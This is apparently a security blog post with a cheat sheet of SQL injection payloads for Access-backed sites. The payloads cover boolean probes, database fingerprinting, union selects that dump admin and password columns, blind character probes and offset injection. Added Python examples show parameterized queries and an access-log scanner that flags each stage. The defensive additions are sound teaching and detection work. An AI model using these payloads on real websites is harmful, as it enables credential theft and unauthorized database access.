Access Injection

2017-12-15  Sec小玖

1. Checking whether an injection point exists

'

and 1=1

and 1=2

or 1=2

' and '1'='1

' and '1'='2


2. Identifying the database type

and exists (select * from msysobjects) > 0        // Access

and exists (select * from sysobjects) > 0         // SQL Server


3. Identifying database tables

and exists (select * from admin)                  // checks whether an admin table exists

4. Identifying column names

and exists (select password from admin)           // checks whether the admin table has a password column

5. Determining the number of columns

order by 10            // the query returns 10 columns

6. Using a union query to retrieve the wanted values

and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin

7. Retrieving specific column values

and 1=2 union select 1,2,admin,4,password,6,7,8,9,10 from admin
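The boolean test in step 1 only produces a visible difference because the application splices the request parameter into the SQL text. The following Python example is added here and is not from the original post; it uses sqlite3 as an offline stand-in for the Access backend (an assumption; the admin table and the admin/password column names follow the page) and puts the concatenated query next to the parameterized one, so the '1'='1 / '1'='2 pair can be run against both and the differential observed only on the vulnerable form.

```python
import sqlite3

# Constructed stand-in: sqlite3 replaces the Access/Jet backend the page targets
# (assumption), using the same admin table and admin/password column names.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table admin (id integer primary key, admin text, password text)")
    con.execute("insert into admin (admin, password) values ('admin', 'constructed-secret')")
    return con

def lookup_concat(con, username):
    """Vulnerable form: the request parameter is spliced into the SQL text,
    so a quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = "select id from admin where admin='" + username + "'"
    return [row[0] for row in con.execute(sql)]

def lookup_param(con, username):
    """Hardened form: the value is bound as a parameter; the driver never
    lets it reach the SQL parser, so quotes and keywords stay plain data."""
    sql = "select id from admin where admin=?"
    return [row[0] for row in con.execute(sql, (username,))]

def boolean_differential(lookup, con, base):
    """Step 1 of the page as an observable: send the '1'='1 and '1'='2 pair
    and report whether the result set changes. True means the input reaches
    the SQL parser; False means the endpoint treats it as an opaque string."""
    true_case = lookup(con, base + "' and '1'='1")
    false_case = lookup(con, base + "' and '1'='2")
    return true_case != false_case

if __name__ == "__main__":
    con = make_db()
    print("concatenated:", boolean_differential(lookup_concat, con, "admin"))   # True
    print("parameterized:", boolean_differential(lookup_param, con, "admin"))   # False
```

The parameterized lookup still finds the real user (lookup_param(con, "admin") returns the row), so the fix costs nothing functionally; the only thing it removes is the ability of a quote character to change the query's structure, which is precisely what every later step on this page depends on.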


Other query statements:

1. Determining the length of the admin value

and (select len(admin) from admin) = 5

and (select len(admin) from admin) > 5

2. Determining the length of the password value

and (select len(password) from admin) = 5

3. Determining the ASCII value of the first character of the admin value

and (select top 1 asc(mid(admin,1,1)) from admin) > 100

4. Determining the ASCII value of the second character of the admin value

and (select top 1 asc(mid(admin,2,1)) from admin) > 100

5. Determining the ASCII value of the third character of the admin value

and (select top 1 asc(mid(admin,3,1)) from admin) > 100


Offset injection:

Mainly used when the table name can be guessed but the column names cannot.

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

1. Replace 22 with *

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin

2. Replace 21 with *

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin

3. Replace 20 with *

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin

4. Keep moving the * one position further left until the query stops returning an error

5. Plug the numbers into the formula

22-16=6

10+6*2=22

union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

4+6*3=22

union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

This dumps column values from the database at random: which column lands in which output position is not under your control.
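Every stage walked through on this page (the boolean probe, the msysobjects fingerprint, the exists(select …) table and column checks, order by counting, union select, the asc(mid(…)) character probes in "Other query statements", and the trailing * and self-join of offset injection) leaves a recognisable pattern in the web server's access log. The Python example below is added here and is not part of the original post. It runs over constructed common-log-format lines for a hypothetical news.asp page (client addresses, timestamps and sizes are made up; the payloads are the ones listed on the page, URL-encoded as a browser sends them), tags each request with the stage it matches, and then groups hits per client so a defender sees the whole reconnaissance chain rather than isolated tautologies.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (common log format) for a hypothetical news.asp page;
# the payloads are the ones listed on the page, URL-encoded as a browser would send them.
LOGS = """\
203.0.113.7 - - [15/Dec/2017:10:00:01 +0800] "GET /news.asp?id=10 HTTP/1.1" 200 5123
203.0.113.7 - - [15/Dec/2017:10:00:02 +0800] "GET /news.asp?id=10%20and%201=1 HTTP/1.1" 200 5123
203.0.113.7 - - [15/Dec/2017:10:00:03 +0800] "GET /news.asp?id=10%20and%201=2 HTTP/1.1" 200 412
203.0.113.7 - - [15/Dec/2017:10:00:04 +0800] "GET /news.asp?id=10%20and%20exists%20(select%20*%20from%20msysobjects)%3E0 HTTP/1.1" 500 0
203.0.113.7 - - [15/Dec/2017:10:00:05 +0800] "GET /news.asp?id=10%20order%20by%2010 HTTP/1.1" 200 5123
203.0.113.7 - - [15/Dec/2017:10:00:06 +0800] "GET /news.asp?id=10%20and%201=2%20union%20select%201,2,admin,4,password,6,7,8,9,10%20from%20admin HTTP/1.1" 200 5210
203.0.113.7 - - [15/Dec/2017:10:00:07 +0800] "GET /news.asp?id=10%20and%20(select%20top%201%20asc(mid(admin,1,1))%20from%20admin)%3E100 HTTP/1.1" 200 5123
203.0.113.7 - - [15/Dec/2017:10:00:08 +0800] "GET /news.asp?id=10%20union%20select%201,2,3,4,a.id,b.id,c.id,*%20from%20((admin%20as%20a%20inner%20join%20admin%20as%20b%20on%20a.id=b.id)%20inner%20join%20admin%20as%20c%20on%20a.id=c.id) HTTP/1.1" 200 6020
198.51.100.3 - - [15/Dec/2017:10:01:00 +0800] "GET /news.asp?id=11 HTTP/1.1" 200 4988
"""

# client, method, url, status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)$')

# One signature per stage of the page, matched against the decoded, lower-cased query string.
SIGNATURES = [
    ("boolean-probe",    re.compile(r"(?:^|[\s'\)])(?:and|or)\s+'?1'?\s*=\s*'?[12]'?")),
    ("db-fingerprint",   re.compile(r"\b(?:msysobjects|sysobjects)\b")),
    ("schema-probe",     re.compile(r"\bexists\s*\(\s*select\b")),
    ("column-count",     re.compile(r"\border\s+by\s+\d+")),
    ("union-select",     re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("blind-char-probe", re.compile(r"\b(?:asc|len)\s*\(\s*(?:mid\s*\()?")),
    ("offset-selfjoin",  re.compile(r",\s*\*\s+from\b|\binner\s+join\s+\w+\s+as\s+\w+")),
]

def classify(query):
    """Return the stage tags (in SIGNATURES order) whose pattern matches this query string."""
    decoded = unquote_plus(query).lower()
    return [tag for tag, pat in SIGNATURES if pat.search(decoded)]

def scan_log(text):
    """Parse each log line and keep only requests that match at least one stage."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, url, status, size = m.groups()
        parts = urlsplit(url)
        tags = classify(parts.query)
        if tags:
            findings.append({"client": client, "path": parts.path,
                             "query": unquote_plus(parts.query),
                             "status": int(status), "tags": tags})
    return findings

def summarize(findings):
    """Group hits per client: one tautology may be noise, but several distinct
    stages from a single address is the reconnaissance chain the page walks through."""
    per_client = {}
    for f in findings:
        entry = per_client.setdefault(f["client"], {"requests": 0, "stages": set()})
        entry["requests"] += 1
        entry["stages"].update(f["tags"])
    return {c: {"requests": e["requests"], "stages": sorted(e["stages"]),
                "chain": len(e["stages"]) >= 3}
            for c, e in per_client.items()}

if __name__ == "__main__":
    hits = scan_log(LOGS)
    for h in hits:
        print(h["client"], h["status"], h["tags"], h["query"])
    print(summarize(hits))
```

The signatures are deliberately narrow (the Access-specific msysobjects name, asc(mid(...)), a * directly before from, a table aliased in an inner join) because on a plain content site these tokens have no legitimate reason to appear in a query string; the per-client grouping is what turns a handful of low-confidence matches into a high-confidence finding, and the 500 on the msysobjects request is the kind of status anomaly worth correlating with the same source.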
